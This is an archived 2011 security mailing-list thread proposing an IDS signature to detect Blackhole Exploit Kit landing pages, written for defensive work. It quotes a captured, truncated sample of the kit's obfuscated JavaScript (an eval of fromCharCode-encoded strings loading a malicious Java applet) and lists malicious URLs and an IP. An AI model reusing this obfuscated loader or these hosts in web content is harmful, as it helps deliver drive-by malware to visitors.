[Emerging-Sigs] Proposed Signature for Blackhole Exploit Landing malicious applet

Nick Randolph randolphdavidn at gmail.com
Mon Oct 3 09:46:39 EDT 2011


I've seen a pretty big jump in these at our site. Here are some sites they
are hitting.
194.219.29.139:http://saveatlasshruggedomslovo.info/
194.219.29.139:http://downloadrandomslovostore.info/main.php
194.219.29.139:http://downloadrandomslovostore.info/content/worms.jar
194.219.29.139:http://downloadrandomslovostore.info/support/Pipe.class
194.219.29.139:http://newdownload-randomsslovo.info/getJavaInfo.jar
194.219.29.139:http://newdownload-randomsslovo.info/content/field.swf

There is a slight change to the fromCharchode section as well, this is what
I saw this morning

String[c+'r'+'omChar'+'C'+'o'+'d'+"e"

Earlier in the packet there is a "c=f" declaration that makes the above.

On Tue, Sep 27, 2011 at 4:19 PM, Matthew Jonkman <
jonkman at emergingthreatspro.com> wrote:

> Pedro is posting with a change, adding a match for |27|romChar|27| to help
> protect that pcre. Good?
>
> Matt
>
>
> On Sep 26, 2011, at 10:38 AM, Nathan wrote:
>
> > Similar to the discussion at
> >
> http://lists.emergingthreats.net/pipermail/emerging-sigs/2011-September/015753.html
> > it looks like thus far we have 3 landing styles.  One covered at the
> above
> > thread, another by Chris with \x09, and this third new proposed below.
> >
> > Only ET signature that fired was 'worms.jar' and I'd rather not rely
> solely on
> > the name of the archive for protection/detection of this kit.
> >
> > #/R should match relative to the previous content match.
> > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET
> CURRENT_EVENTS
> > Blackhole Exploit Kit Landing Response Malicious applet";
> > flow:established,from_server; content:"|0d 0a|<html><body><applet
> code='";
> > fast_pattern; nocase;
> >
> pcre:"/,[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],/iR";
> > classtype:bad-unknown; sid:x; rev:1;)
> >
> > PCRE version 8.02 2010-03-19
> >
> >  re>
> >
> /,[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],/
> > data>
> >
> e(String[c+'romChar'+'Co'+'d'+'e'](50*2,111+l,49.5*2,117+l,54.5*2,101+l,55*2,116+l,23*2,119+l,57*2,105+l,58*2,101+l,20*2,39+l,30*2,99+l,50.5*2,110+l,58*2,101+l,57*2,62+l,30*2,104+l,24.5*2,62+l,40*2,108+l,50.5*2,97+l,57.5*2,101+l,16*2,119+l,48.5*2,105+l,58*2,32+l,
> > 0: ,49.5*2,117+l,54.5*2,101+l,55*2,116+l,
> > data>
> >
> >
> > 09:19:23.734596 IP 194.176.191.62.80 > RFC_1918.1448: . 1:1261(1260) ack
> > HTTP/1.1 200 OK
> > Date: Mon, 26 Sep 2011 14:09:18 GMT
> > Server: Apache/2.2.13 (Linux/SUSE)
> > X-Powered-By: PHP/5.3.3
> > Keep-Alive: timeout=15, max=100
> > Connection: Keep-Alive
> > Transfer-Encoding: chunked
> > Content-Type: text/html
> >
> > 4d018
> > <html><body><applet code='support.ForMail.class' archive='./worms.jar'
> > width='1' height='1'><param name='p'
> > value='e00oMDDBBBV2./fkqhQNQV%RD.qR/D3D./2h1Voeojfo=8zxa'/></applet><div
> > id="qwe" style="visibility:hidden;">&#50;</div>
> > <script>
> > a=window['document']['getElementById']('qwe');
> > try{app()}catch(q){
> > if(1){
> >        a.innerHTML=+[2];
> >        cc='ev';
> > }
> > }
> > try{if(r.test('asda') && !r.test('asda') && r.test('asda'))throw
> > 1;}catch(q){c='f';v='TML';}
> > z=a['inne'+'rH'+v];
> > try{if(r.test('asda') && !r.test('asda') && r.test('asda'))throw
> > 1;}catch(q){l=z*1}
> > if(a.innerHTML == '2')
> > e=window[cc+'al'];
> >
> e(String[c+'romChar'+'Co'+'d'+'e'](50*2,111+l,49.5*2,117+l,54.5*2,101+l,55*2,116+l,23*2,119+l,57*2,105+l,58*2,101+l,20*2,39+l,30*2,99+l,50.5*2,110+l,58*2,101+l,57*2,62+l,30*2,104+l,24.5*2,62+l,40*2,108+l,50.5*2,97+l,57.5*2,101+l,16*2,119+l,48.5*2,105+l,58*2,32+l,56*2,97
> >
> +l,51.5*2,101+l,16*2,105+l,57.5*2,32+l,54*2,111+l,48.5*2,100+l,52.5*2,110+l,51.5*2,46+l,23*2,46+l,30*2,47+l,52*2,49+l,31*2,60+l,23.5*2,99+l,50.5*2,110+l,58*2,
> >
> > Thanks,
> > Nathan
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >
> > Support Emerging Threats! Subscribe to Emerging Threats Pro
> http://www.emergingthreatspro.com
> > The ONLY place to get complete premium rulesets for Snort 2.4.0 through
> Current!
>
>
> ----------------------------------------------------
> Matt Jonkman
> Emerging Threats Pro
> Open Information Security Foundation (OISF)
> Phone 866-504-2523 x110
> http://www.emergingthreatspro.com
> http://www.openinfosecfoundation.org
> ----------------------------------------------------
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> Support Emerging Threats! Subscribe to Emerging Threats Pro
> http://www.emergingthreatspro.com
> The ONLY place to get complete premium rulesets for Snort 2.4.0 through
> Current!
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20111003/0de9537b/attachment.html


More information about the Emerging-sigs mailing list